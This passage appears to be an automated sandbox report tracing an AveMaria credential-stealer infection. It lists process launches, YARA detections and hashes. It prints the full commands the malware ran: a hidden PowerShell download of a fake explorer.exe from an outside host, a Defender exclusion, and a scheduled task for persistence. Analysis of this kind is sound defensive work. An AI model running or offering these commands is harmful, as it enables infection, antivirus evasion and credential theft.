                    Reputation:high

                    Target ID:6
                    Start time:08:13:30
                    Start date:23/09/2022
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x4a7a0000
                    File size:345088 bytes
                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:8
                    Start time:08:13:31
                    Start date:23/09/2022
                    Path:C:\Users\user\AppData\Roaming\explorer.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x1330000
                    File size:974336 bytes
                    MD5 hash:87B246B26208A9831A4372664C518C2C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:9
                    Start time:08:13:31
                    Start date:23/09/2022
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
                    Imagebase:0x13ffc0000
                    File size:473600 bytes
                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.937256768.0000000001BA6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.936976360.00000000003D9000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    Reputation:high

                    Target ID:11
                    Start time:08:13:37
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
                    Imagebase:0x223f0000
                    File size:452608 bytes
                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    Target ID:13
                    Start time:08:13:38
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
                    Imagebase:0x880000
                    File size:179712 bytes
                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:15
                    Start time:08:13:41
                    Start date:23/09/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Imagebase:0x1020000
                    File size:261944 bytes
                    MD5 hash:7FB523211C53D4AB3213874451A928AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Target ID:16
                    Start time:08:13:42
                    Start date:23/09/2022
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x4a7a0000
                    File size:345088 bytes
                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:17
                    Start time:08:13:42
                    Start date:23/09/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Imagebase:0x1020000
                    File size:261944 bytes
                    MD5 hash:7FB523211C53D4AB3213874451A928AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                    Target ID:19
                    Start time:08:13:42
                    Start date:23/09/2022
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
                    Imagebase:0x13f260000
                    File size:473600 bytes
                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000013.00000002.961202850.000000000010E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

                    Target ID:20
                    Start time:08:13:42
                    Start date:23/09/2022
                    Path:C:\Users\user\AppData\Roaming\explorer.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x1330000
                    File size:974336 bytes
                    MD5 hash:87B246B26208A9831A4372664C518C2C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                    Target ID:22
                    Start time:08:13:47
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
                    Imagebase:0x223b0000
                    File size:452608 bytes
                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET

                    Target ID:24
                    Start time:08:13:48
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
                    Imagebase:0xfe0000
                    File size:179712 bytes
                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:26
                    Start time:08:13:52
                    Start date:23/09/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Imagebase:0x1020000
                    File size:261944 bytes
                    MD5 hash:7FB523211C53D4AB3213874451A928AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:27
                    Start time:08:14:03
                    Start date:23/09/2022
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x4a7a0000
                    File size:345088 bytes
                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:29
                    Start time:08:14:04
                    Start date:23/09/2022
                    Path:C:\Users\user\AppData\Roaming\explorer.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x1330000
                    File size:974336 bytes
                    MD5 hash:87B246B26208A9831A4372664C518C2C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

                    Target ID:30
                    Start time:08:14:08
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
                    Imagebase:0x21cc0000
                    File size:452608 bytes
                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET

                    Target ID:32
                    Start time:08:14:09
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
                    Imagebase:0x560000
                    File size:179712 bytes
                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:34
                    Start time:08:14:13
                    Start date:23/09/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Imagebase:0x1020000
                    File size:261944 bytes
                    MD5 hash:7FB523211C53D4AB3213874451A928AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:35
                    Start time:08:14:22
                    Start date:23/09/2022
                    Path:C:\Windows\System32\verclsid.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Imagebase:0xffa70000
                    File size:11776 bytes
                    MD5 hash:3796AE13F680D9239210513EDA590E86
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:36
                    Start time:08:14:23
                    Start date:23/09/2022
                    Path:C:\Windows\System32\notepad.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
                    Imagebase:0xfff60000
                    File size:193536 bytes
                    MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    No disassembly